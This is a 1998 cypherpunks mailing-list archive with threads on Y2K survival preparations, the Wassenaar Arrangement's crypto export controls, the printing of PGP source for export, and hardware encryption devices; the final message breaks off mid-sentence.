>> dump our dish water down the drain, it gets "recycled" to flush the
>> toilets.
>get them to shit outside.

	Why, so bacteria can fester, and things like dystensia (spelled
wrong, bacteria that causes "the shits" and other stomach problems) and
other diseases run rampant?

>I am not suggesting that Y2K is going to be a cakewalk. Quite possibly
>not. But Gary North is not worth listening to because he is biased and
>has a conflict of interests.

	I am rapidly coming to the conclusion that the biggest problem with
Y2K is not going to be technical, but the Cultists & Gun Nuts (as a
distinct group from survivalists who simply wish to get on with their
lives) realize that it isn't the Apocolypse, and then seek to make it so.

>> 	Live off those who planned ahead, stocked up spent thousands of
>> dollars on Food, Generators, guns & etc. but didn't spend 10 minutes making
>> sure their bodies were prepared & died of heart attacks trying to pull
>> start their generators to keep their computers running.
>> 	(I'm mostly joking about the above)
>I think that you had a good point... A long time ago I posted a "Skills

	Like I said, mostly.

>vs. guns" article to misc.survivalism. its point was, that in the long
>run having good skills and health was more important than stocking up.

	Bet they tried to run you out of there, they don't want to hear
that kinda stuff, they want to hear how to get the most out of their 4X4,
argue over whether the AK is better than the M-16 (hint, if you have to
shoot more than a clip, you're fucked) for a "survival" situation.

>> >     Let me give a simple example.  How will you wash
>> >clothes for everyone?  Let's assume that you have water.
>> >(Dreamer!)  You can buy a 40-lb. tub of Wind Fresh laundry
>> >detergent from Sam's Club for $10.  It will do 160 loads.
>>
>> 	Ummm. Gary, how did people wash their clothes before they could buy
>> soap at the store?
>>
>> 	Why don't you print a recipe for Lye Soap?
>You can make semi-good "soap" from animal fat and ash.

	That is what "lye" soap is (basically)

>> 	Been despised all my life. I'm sure you know what that is like.
>No biggie.
>Besides, if you don't want to be despised, just don't be clean.

	That is not an option.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Dec 1998 06:11:28 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: Streams, Voice, and Sensitive Dependence
In-Reply-To: <9812049127.AA912797826@smtplink.thomasmore.edu>
Message-ID: <v04020a43b28e05a7d64c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:38 PM -0500 on 12/4/98, Robert Hettinga wrote:

> PGP is not a cipher. PGP is an application with a bunch of ciphers in it,
> most of the block ones.
          ^them...

...and I'm not even sure about the 'most' part. Could be all of them.

Cheers,
Robert Hettinga

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Sat, 5 Dec 1998 00:28:04 +0800
To: cypherpunks@cyberpass.net
Subject: TESTING... Seems like I don't get all my mail...
Message-ID: <366803E8.DB80621B@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



TEST TEST TEST TEST
JDO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 00:39:11 +0800
To: cypherpunks@Algebra.COM
Subject: joy of export, h/ware
Message-ID: <199812041610.RAA19470@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:06 AM 12/3/98 -0800, Michael Motyka wrote:
>> Their architecture has real $$ value because it cracks 99% of
>> "encrypted" traffic.
>>
>What type of attack was used in the famous test? Known plaintext? It
>gets a bit tougher in the real world doesn't it?

Not really.  

>> Offering the real stuff for sale in US requires some investment.
>>
>Really?

Interesting question.  Open a delaware corporation and sell 
munition-quality gate arrays in the back pages of Popular Electronics
or EE Times... keep us posted...


>I expect it would be easier to convince a manufacturer to participate
>with a working prototype than it would with only an idea.

Duh :-)

>> Hardware is overkill for the single voice line. PGPfone works fine
>> there.      ^^^^^^^^
>>
>No it is not. 500k gates may be too much but I maintain that you simply
>cannot trust the Wintel HW, Windows or anything you cannot analyze in
>detail and freeze. Besides, people like little palm-sized gadgets.

* 10,000 gates cost less than a paper clip.  500K is high for a block cipher.

* If we don't find something to do with them, at the rate we're producing
them,
the earth will be covered with silicon and its compounds soon.   :-)

* Its not like we'd ever put floating point routines, or blitting routines,
out of business by integrating those functions in Si, is it?
Naah, we'd never accelerate encryption with hardware, 
the CPU is bored and has nothing better to do, and its soooo expensive
to print chips..

(That being said, I'll point out to myself how many asics have been replaced
by dsps...but not without some inefficiency)

* PGPfone on a  very fast cpu plus fast link is still less pleasant than
a noisy cordless (no pun intended).

* We'd never take encryption hardware through the same path as modems,
would we?
First used between companies, then used for remote access, eventually you
can't buy a bloody machine without one.  Getting cheaper, faster, closer
to the motherboard, taken for granted by applications.  Ever seen a 300
baud, 40 lb modem, cost probably $3000 in 1970 dollars?  

The final level of deployment is when garage-door-openers, car remotes, and
childrens' toys (e.g., radio controlled cars) use encryption chips... or
chips with encryption, anyway.


>Now an embedded system for secure e-mail that used a PC as a gateway
>might be kind of cool. You drop encrypted attachments onto a driver that
>sends them to the unit where you read them. Anything you enter and
>encrypt at the unit is presented as a file at the host to be attached
>and sent. USB would be plenty quick for that sort of stuff.

Yes, the PC can be used as an untrusted router if the encryption is done
outside it.  The outside encrypting unit should also perform NAT, otherwise
the PC (doing the tunnelling) can broadcast traffic ('trap and trace' in
the pots world)
info.  The lower power used in PDAs really helps keep the boys in the White
Van
Across the Street busy.

Email is so low-bandwidth that software suffices.  Secure video
conferencing on your
Dick Tracy (tm) telewatch needs h/w support.




--- Is 5% of YOUR communications encrypted or anonymous in '98 ??  ---







  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 08:28:17 +0800
To: petro@playboy.com (Petro)
Subject: Re: y2k/gary north delusions
In-Reply-To: <v04011703b28df9c5afbe@[206.189.103.230]>
Message-ID: <199812042341.RAA18742@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Petro wrote:
> At 3:48 PM -0500 12/4/98, Igor Chudov @ home wrote:
> >> 	Not just crazy, flat out _wrong_ in at least one case:
> >> >     Let's start with the basics: water.  An urban adult
> >> >uses 75 to 100 gallons of water a day.  This doesn't count
> >> 	Like hell. Your average adult drinks at MOST 1 gallon a day,
> >> including coffees sodas etc. It is _real_ difficult to drink over 1 gallon,
> >> and you can seriously fuck your system up (mineral balances) if you drink
> >> too much.
> >> 	I drink a LOT of (non-alcohol) fluid (as opposed to drinking
> >> solids) a day, and I usually top out at 3 quarts, unless I am doing a long
> >> distance ride.
> >> 	Let's round it up and call it one gallon for drinking.
> >> 	Showers: If you need more than 10-15 gallons, you are taking too long.
> >Come on people. We are talking SURVIVAL here. Can you ski your showers
> >if you do not have enough water?
> 
> 	In the first block he was talking about _normal_ _day_to_day_ water
> usage. I was attacking that point.
> 
> >The true answer is, if shit hits the fan and there is no water in the
> >faucet, almost all activity except drinking and washing hands and dishes
> >can be curtailed.
> 
> 	Not for long periods of time. General cleanlyness IS VERY important
> in survival situations. Clean skin and clothes help prevent infections from
> common wounds (like barking your shin against something, or a scratch from
> a tree branch &etc.)

Well... The answer is that there is much less washing needed for
survival than it is needed for day to day civilized American life.

For instance, I change my shirts every day. If shit hits the fan,
you can wear a shirt for two weeks. Similar story is with other
clothes.

> >Even flushing toilets is not necessary as anyone can shit outside.
> 
> 	Not in a crowded enviroment, that being a mid-sized town to a large
> city.

Come one, you can set up big latrines outside houses.

> >I am speaking out of personal experiences, living with water outages
> >while we were in the Russian countryside. It was no big deal, period.
> 
> 	Countryside.
> 
> >> 	Cooking: another gallon.
> >It is included.
> 
> 	Included in what? The pasta? The rice? The beans?

Well, yeah, of course. With pasta, you can make soup and eat the
water, too.

> 	I am not talking about a camping trip here, I am talking about
> living off stored food for one to three months (anything longer (IMO) takes
> VERY VERY different preperations.

Well, yes, but still you need no more than 3 gallons of water,
which was my main contention.

> >Much less.
> >> 	Total: 40-75 (rounded up).
> >Total: 2-3.
> 
> 	In a max survival do-or-die situation, yes. For long term health,
> no. and besides, that was a number assuming "normal" usage.

It is entorely possible to live a decent life off of 3 gallons of
water per day. I am speaking out of my experience.
 
> >> 	Ok, so let's cut that back to what we _need_. First off, we don't
> >> dump our dish water down the drain, it gets "recycled" to flush the
> >> toilets.
> >get them to shit outside.
> 
> 	Why, so bacteria can fester, and things like dystensia (spelled

dysenteria

> wrong, bacteria that causes "the shits" and other stomach problems) and
> other diseases run rampant?

There is no problem with a properly set up outside toilet. 

There is a problem with eating unwashed food AND dirty hands.

To set up a toilet, dig a hole about 3-4 feet deep, fortify it
somewhat so that it would not cave in (for most soils fortification is
unnecessary). Then, build something above the hole so that people would
not be embarrassed to go there.

That's IT. Our country house in Russia used this system, it is reasonably
safe, etc. The whole neighborhood of houses used this system, as did
millions of other Russians. It _is_ safe. (Our apartment in Moscow had
a regular flush toilet bathroom).

> >I am not suggesting that Y2K is going to be a cakewalk. Quite possibly
> >not. But Gary North is not worth listening to because he is biased and
> >has a conflict of interests.
> 
> 	I am rapidly coming to the conclusion that the biggest problem with
> Y2K is not going to be technical, but the Cultists & Gun Nuts (as a
> distinct group from survivalists who simply wish to get on with their
> lives) realize that it isn't the Apocolypse, and then seek to make it so.

A point I also made recently.

> >> 	Live off those who planned ahead, stocked up spent thousands of
> >> dollars on Food, Generators, guns & etc. but didn't spend 10 minutes making
> >> sure their bodies were prepared & died of heart attacks trying to pull
> >> start their generators to keep their computers running.
> >> 	(I'm mostly joking about the above)
> >I think that you had a good point... A long time ago I posted a "Skills
> 
> 	Like I said, mostly.
> 
> >vs. guns" article to misc.survivalism. its point was, that in the long
> >run having good skills and health was more important than stocking up.
> 
> 	Bet they tried to run you out of there, they don't want to hear
> that kinda stuff, they want to hear how to get the most out of their 4X4,
> argue over whether the AK is better than the M-16 (hint, if you have to
> shoot more than a clip, you're fucked) for a "survival" situation.

No, they were pretty nice. Not all of them agreed, but they had a
sensible discussion.

> >> >     Let me give a simple example.  How will you wash
> >> >clothes for everyone?  Let's assume that you have water.
> >> >(Dreamer!)  You can buy a 40-lb. tub of Wind Fresh laundry
> >> >detergent from Sam's Club for $10.  It will do 160 loads.
> >>
> >> 	Ummm. Gary, how did people wash their clothes before they could buy
> >> soap at the store?
> >>
> >> 	Why don't you print a recipe for Lye Soap?
> >You can make semi-good "soap" from animal fat and ash.
> 
> 	That is what "lye" soap is (basically)

Ahh, thanks.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 01:13:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Wassenaar Statement
Message-ID: <199812041645.RAA23979@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



If these reports are correct, the United States could end up being one of
the countries with the most LIBERAL export controls.

In the United States, it is currently legal to export any cryptographic
software you like - as long as it is in printed form.  This is because
of fears of violating the First Amendment.  Not all countries have such
strong conventions for protecting the printed word.

PGP source code is being exported in printed form, scanned in overseas,
and then distributed from there.  If the Wassenaar Arrangement prevents
it from being exported from its current overseas distribution site,
a solution can be to ship it in printed form from the U.S. to a wide
range of other countries.  As long as those countries don't prohibit
domestic distribution of crypto software, strong cryptography can still
be made available almost everywhere.

The PGP source code books begin with a section that is, in effect, a
"how-to" for printing software in such a way that it can be reliably
scanned.  Each page and each line has a checksum.  The books come with
a Perl script short enough to enter by hand that does basic checksum
verification.  This is used to read a second, longer Perl script that
can do error correction; and this is then used to bootstrap into the
full script which will read the books, create all the files, organize
the directories, and reconstruct the entire source code tree.

It may be that in the future this will be the most effective way to
communicate internationally about security software.  It would be
good for other groups to become familiar with this technology which has
been pioneered by PGP.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Dec 1998 08:08:57 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Wassenaar Statement
Message-ID: <v04020a4cb28e2148551f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
To: "Robert Hettinga" <rah@shipwright.com>, <dcsb@ai.mit.edu>
Subject: RE: Wassenaar Statement
Date: Fri, 4 Dec 1998 18:02:40 -0500
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Importance: Normal

We have seen this type of press release before. Uncle Sam goes
off to a conference and returns to state that the rest of the
world has committed to its position - only to find out later that
the rest of the world did not. Anyone remembe the time the
crypto Tzar went off to the European Association (a non binding
talking shop) and got a similar 'undertaking'.

It is more likely that the Wassenaar statement reflects what went
on at the meeting. But even then most countries in Europe have a
democratic process in which decisions are made by elected
representatives and not by beaureacrats at closed treaty
negotiations.

Just as the munitions acts under which the ITAR crypto regulations
are purported to be made clearly do not provide the executive with
the powers claimed, neither do most of the European enabling
acts for COCOM.

Nor in a parliamentary system is it quite so easy for the executive
to perform Zimmerman type persecutions. If the same tactics had
been used in the UK the Home secretary would have faced political
consequences for the failure of the prosecution. The Matrix Churchill
affair played a significant part in the collapse of the Major
government in the UK. I doubt Straw would be keen on a repeat.


The UK DTI proposals requiring GAK as a condition of CA licensing
may appear to meet the Freeh objectives but since there is no
proposal to make licensing a requirement of doing business the result
is most likely to be nobody becomes a 'licensed CA'. There is a
legitimate business need for key recovery but nobody offering those
services is going to want access to the customer's private keys.
Doing so would be akin to keeping triffids as pets. It is not
necessary to keep actual private keys to achieve the objective of
controlling access to the private keys.


		Phill

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Dec 1998 08:14:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: FC: So far, I think Mr. Aarons' Wassenaar statement is  disinformation
Message-ID: <v04020a4db28e215d5a28@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 4 Dec 1998 18:19:58 -0500 (EST)
From: Peter F Cassidy <pcassidy@world.std.com>
To: Robert Hettinga <rah@shipwright.com>
Cc: dcsb@ai.mit.edu
Subject: Re: FC: So far, I think Mr. Aarons' Wassenaar statement is
disinformation
Mime-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Peter F Cassidy <pcassidy@world.std.com>



Friends,

In e-mail exchanges with EC ministers and government ministers in W.
European nations that I have had about Aarons one thing is consistent. All
seemed to be shocked and dismayed at his ability to report out facts to
the press in the US and to the Clinton Administration that have little to
do with actual events. It would not surprise any of them if Aarons'
unilaterally declared a 33 nation crypto-control agreement that was based
entirely on his baroque misunderstanding of the facts.

PFC


On Fri, 4 Dec 1998, Robert Hettinga wrote:

>
> --- begin forwarded text
>
>
> X-Sender: declan@mail.well.com
> Date: Fri, 04 Dec 1998 15:29:29 -0500
> To: politech@vorlon.mit.edu
> From: Declan McCullagh <declan@well.com>
> Subject: FC: So far, I think Mr. Aarons' Wassenaar statement is
>   disinformation
> Mime-Version: 1.0
> Sender: owner-politech@vorlon.mit.edu
> Reply-To: declan@well.com
> X-Loop: politech@vorlon.mit.edu
> X-URL: Politech is at http://www.well.com/~declan/politech/
>
> [John is basing his analysis below on what's been posted on the Wassenaar
> site so far, and these kinds of documents aren't always put online
> immediately. That said, if Ambassador Aaron is talking about the online
> documents and John's analysis is correct, the Clinton administration is
> going beyond mere spin: it is trying to deliberately deceive. --Declan]
>
> *********
>
> Subject: So far, I think Mr. Aarons' Wassenaar statement is disinformation
>
> Date: Fri, 04 Dec 1998 10:55:00 -0800
> From: John Gilmore <gnu@toad.com>
>
> I have not found a single confirmation of the Aarons statement that
> the 33 Wassenaar countries have agreed to change the exemption for
> mass market crypto software.  (The NY Times and Reuters stories both
> quote Ambassador Aarons.)
>
> This lack of confirmation includes the Wassenaar Arrangement statement
> itself, which merely says:
>
> 	The amendments to the lists included elimination of coverage of
> 	commonly available civil telecommunications equipment as well
> 	as the modernisation of encryption controls to keep pace with
> 	developing technology and electronic commerce, while also being
> 	mindful of security interests.
>
> 	http://www.wassenaar.org/docs/press_4.html
>
> The Wassenaar Arrangement works by consensus; any member can block the
> adoption of any item merely by voting against it.  The policy Aarons
> announced is directly contradictory to the recently reaffirmed
> government policies of Finland and Ireland.  In addition, Canada and
> Germany have recently stated strong pro-crypto positions (while
> waffling on the particular issue of the treatment of PD and MM
> software).
>
> The Wassenaar Arrangement also states:
>
> 	This arrangement will not be directed against
> 	any state or group of states and will not impede
> 	bona fide civil transactions.
>
> To the extent that there is any attempt in the Agreement to control
> mass market or public domain crypto software, such a provision
> would clearly contradict this limitation written into the Arrangement.
> The Arrangement is for military goods -- not for civilian goods.
> PGP and other civilian crypto tools are not military by any stretch
> of the imagination.  It's hard to imagine that all 33 countries would
> ignore this obvious problem, especially when it was pointed out to them
> by concerted lobbying over the last several months.
>
> I also note that none of the statements are clear about exactly what
> is affected.  PGP, SSH, SSLEAY, Linux IPSEC, and many other crypto
> tools are "public domain" rather than "mass market" software.  The
> General Software Note (originally from COCOM, and adopted bodily by
> Wassenaar when it was formed) exempted both "public domain" and "mass
> market" software from all controls.
>
> Finally, a companion paper released from Wassenaar yesterday shows a
> clear concern by the body for human rights and fundamental freedoms:
> http://www.wassenaar.org/docs/criteria.html:
>
> 	e.  Is there a clearly identifiable risk that the weapons might
> 	be used for the violation and suppression of human rights and
> 	fundamental freedoms?
>
> (In this case if the the Aarons statement was true, Wassenaar itself
> would be used for the violation and suppression of human rights and
> fundamental freedoms.  It's hard to see that the delegates would also
> ignore this and vote to suppress human rights and freedoms.)
>
> So, I see two major probabilities here:
>
> 	*  Either Aarons is lying, to see how much trouble this stirs up.
> 	This would be taking a page from FBI Director Freeh, who
> 	announced FBI support for domestic controls on crypto last year,
> 	and was then disavowed by the Administration when a ruckus
> 	resulted.
>
> 	*  Or the NSA has cut a deal with these countries.  Then the
> 	question is:  what did NSA offer in return?  The usual trade
> 	has been access to the flow of wiretaps (as in the UKUSA
> 	agreement that gives Britain, NZ, Australia, and Canada access
> 	to Echelon -- look who the strongest supporters of the US position
> 	are).  Another alternative is that they used wiretaps to
> 	blackmail senior politicians in the recalcitrant countries.
> 	(It happened in the US by J. Edgar Hoover for many years.)
>
> Do either of you have any info that would tend to confirm or deny
> one of these theories?
>
> EFF and the GILC members are checking with various governments to
> start to flesh out what *actually* happened.
>
> I should also note that developments like this are rather expectable.
> Every time crypto policies get decided in a closed-door meeting where
> the US government is invited, they get worse.  Whenever crypto
> policies are set in open meetings where the public and the press are
> able to watch -- or even, god forbid, participate -- they get better.
> The OECD meetings of a few years ago were intended to be the first,
> but citizens and journalists swarmed the meeting site, buttonholed
> delegates as they entered and left, and turned it into the second.  We
> should've done the same with this Wassenaar meeting.
>
> US civil libertarians are prying crypto policy decisions into the
> light of day via the courts and the Freedom of Information Act.
> Classified NSA/FBI testimony to Congress is getting declassified, and
> then its obvious lies are easily rebutted by the public.
>
> The natural response of a bureacracy that is more concerned with its
> own power to wiretap, than with making the right decisions for its
> citizens, is to move its crypto maneuvering overseas into "diplomatic
> meetings", held under cover of diplomatic secrecy, where they can lie
> and twist arms with impunity.
>
> 	John
>
>
> --------------------------------------------------------------------------
> POLITECH -- the moderated mailing list of politics and technology
> To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
> subscribe politech
> More information is at http://www.well.com/~declan/politech/
> --------------------------------------------------------------------------
>
> --- end forwarded text
>
>
> -----------------
> Robert A. Hettinga <mailto: rah@philodox.com>
> Philodox Financial Technology Evangelism <http://www.philodox.com/>
> 44 Farquhar Street, Boston, MA 02131 USA
> "... however it may deserve respect for its usefulness and antiquity,
> [predicting the end of the world] has not been found agreeable to
> experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>
> For help on using this list (especially unsubscribing), send a message to
> "dcsb-request@ai.mit.edu" with one line of text: "help".
>


For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 5 Dec 1998 11:09:07 +0800
To: cryptography@c2.net
Subject: What was the quid pro quo for Wassenaar countries?
Message-ID: <199812050240.SAA24692@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I spoke some hours ago with Tatu Ylonen in Finland.  His company has
confirmation from the Finnish government that the government agreed to
a proposal to limit mass-market crypto exports to 56 bits.  Perhaps
he or someone else from SSH can post more details.

So *something* really did happen at the Wassenaar meeting, but we
don't know two important things:

	*  What exactly did they agree to?  In particular, is public
	   domain -- as opposed to mass market -- crypto controlled?

	*  And what did NSA offer, to convince many countries to
	   directly contradict policies that they had arrived at
	   during year-long public consultations with their own citizens?
	   A carrot?  A stick?  Blackmail from wiretaps?  Access
	   to NSA's wiretap network in return for cooperation?
	   What was the strong motivation for so many countries to go
	   against their own economic and self-determination interests?

It was pointed out to me that the Wassenaar Arrangement has no legal
effect.  Each country has to go back and amend its own local controls.
However, I personally saw cases more than a year ago where both Japan
and Belgium were restricting bona fide civilian crypto transactions
"because Wassenaar requires us to" when in fact it didn't.  This
development will give these countries much more "cover" to implement
draconian policies, under secret arm-twisting from the US.

We will have to fight this one in the trenches, in each country.
First step is to raise a hue and cry and put each government on the
defensive (as they well ought to be).  Then let's find out what "deal"
they made with the devil.  Finally let's see whether, as Perry says,
civil rights and political processes work, and the will of the people
will actually end up codified in the laws of each country.  Or not.

	John

PS:  I particularly like Ambassador Aaron's characterization that
this new development will help US industry, by censoring foreign crypto
publishers in the same way the US government censors US publishers.
A giant step forward for freedom and commerce everywhere, eh Mr. Aaron?
What an incredibly talented liar, I mean diplomat, he is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 5 Dec 1998 08:55:01 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: y2k/gary north delusions (fwd)
Message-ID: <199812050044.SAA26846@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 04 Dec 1998 20:22:18 -0500
> From: Michal Hohensee <mah248@nyu.edu>
> Subject: Re: y2k/gary north delusions

> You cannot sustain a modern city without a working sewer system. 
> Remember what cities were like in the middle ages?  I believe some
> historians refer to them as "population sinks" for the surrounding
> countryside.  Not for a lack of wealth or commerce, but for a lack of
> sanitation.

Paris and London had populations of over a million each and didn't have a
sewer system. It was traditional for people to throw their chamber pots out
into the street along with the offal from the various animals.

The reality is that the folks who support the various systems would have
them no manual over-ride within 24 - 48 hours so the worst case scenario
won't happen. Countries that aren't automated won't notice the difference
and the city services that are won't be down more than a week.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 5 Dec 1998 08:58:12 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: y2k/gary north delusions (fwd)
Message-ID: <199812050046.SAA26911@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: y2k/gary north delusions
> Date: Fri, 4 Dec 1998 17:40:59 -0600 (CST)
> From: ichudov@algebra.com (Igor Chudov @ home)

> Well... The answer is that there is much less washing needed for
> survival than it is needed for day to day civilized American life.

True, you don't have to water your grass and wash your car.

> For instance, I change my shirts every day. If shit hits the fan,
> you can wear a shirt for two weeks. Similar story is with other
> clothes.

You won't do that sort of stuff for long. A couple of months at best before
you get skin infections and then it's down-hill from there.

It's pretty much a bogus point though since none of the systems like power,
water, and sewer won't be down more than a week at most.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 09:05:50 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: y2k/gary north delusions (fwd)
In-Reply-To: <199812050044.SAA26846@einstein.ssz.com>
Message-ID: <199812050046.SAA19446@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> > Date: Fri, 04 Dec 1998 20:22:18 -0500
> > From: Michal Hohensee <mah248@nyu.edu>
> > Subject: Re: y2k/gary north delusions
> 
> > You cannot sustain a modern city without a working sewer system. 
> > Remember what cities were like in the middle ages?  I believe some
> > historians refer to them as "population sinks" for the surrounding
> > countryside.  Not for a lack of wealth or commerce, but for a lack of
> > sanitation.
> 
> Paris and London had populations of over a million each and didn't have a
> sewer system. It was traditional for people to throw their chamber pots out
> into the street along with the offal from the various animals.

Guess why they had those devastating epidemics.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 09:08:06 +0800
To: mah248@nyu.edu (Michal Hohensee)
Subject: Re: y2k/gary north delusions
In-Reply-To: <36688ACA.C9F515B3@nyu.edu>
Message-ID: <199812050047.SAA19462@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Michal Hohensee wrote:
> 
> 
> Igor Chudov @ home wrote:
> > 
> > Petro wrote: 
> > >       Ok, so let's cut that back to what we _need_. First off, we don't
> > > dump our dish water down the drain, it gets "recycled" to flush the
> > > toilets.
> > 
> > get them to shit outside.
> > 
> 
> Bad bad bad bad bad bad *bad* idea.  This might be ok in the Russian
> countryside, or any other countryside, but it an *excessively* bad thing
> in just about any modern city.  If running water fails to run in the
> cities, and people do as you suggest, and take their business outside,
> it will not be long before tremendous numbers of people get sick and
> die.  What with the high concentrations that people live in in most
> cities, I expect that this'd make the Black Death look like a mild case
> of the flu.

Like I said, someone would need to build a latrine. That's all that's
needed.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 5 Dec 1998 11:17:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Vengeance Libertarianism
Message-ID: <3668A217.32CB@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



My oh my,

The alternative to outright revolution has historically been to pack up
and ship out to whatever frontier was in vogue. Dangerous, difficult,
but apparently compelling if the home situation sucked badly enough.
Potentially very rewarding to the survivors.

The historical fate of any frontier has been that as soon as it has
become somewat hospitable the shitheads arrive with their carpet bags
and make it over into the same fucking thing that everyone ran away from
in the first place. The first sign of inFESTERation was often a church,
followed by a town hall which filled up quickly enough and shortly
thereafter hired a sheriff to enforce the town gun ban and who
eventually needed more men...

And so the cycle repeats with the virtual frontier we're in right now.
It was just fine until "they" came along to "civilize" it. Unfortunately
backs are to the wall and there is nowhere else to go because SPACE
SUCKS MOOSE ALIENS DRY LIKE BUGS. Top that.

they        - esRb
to civilize - to own, regulate, commercialize and tax
esRb        - evil, scumsucking, Reptilian bastards

I could probably develop some sort of virtual space cowboy allegory here
that would go on for (p)ages and involve the painful, bloody death of
many an evil villian at the hand of a courageous hero and enough deviant
sex ( whinny ) to keep the audience enthralled to the very end. The
story could probably be continued until well after the traffic has
subsided but what the hell, I like driving 5 mph, it's good for my car's
engine, my patience and the bandwidth shortage.

m




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 5 Dec 1998 11:24:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Streams, Voice, and Sensitive Dependence
Message-ID: <3668A32C.5954@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> http://www.starium.com
> 14.4 modem, awsome sound quality, 2048 bit DH, 3DES.

The web site is pretty sparse. No wonder I couldn't find them before - I
was looking for "Starion" a while back. I'll call them next week -
they're practically local. What's the approximate price?

I have another question for you:

I thought I was a real whiz kid a few years back when I figured out that
by using an agreed upon startup key then using a "random" public/private
key pair generated by the SW, two voice stations could exchange a
"random" session key. With thumbscrews and the rack you could not get
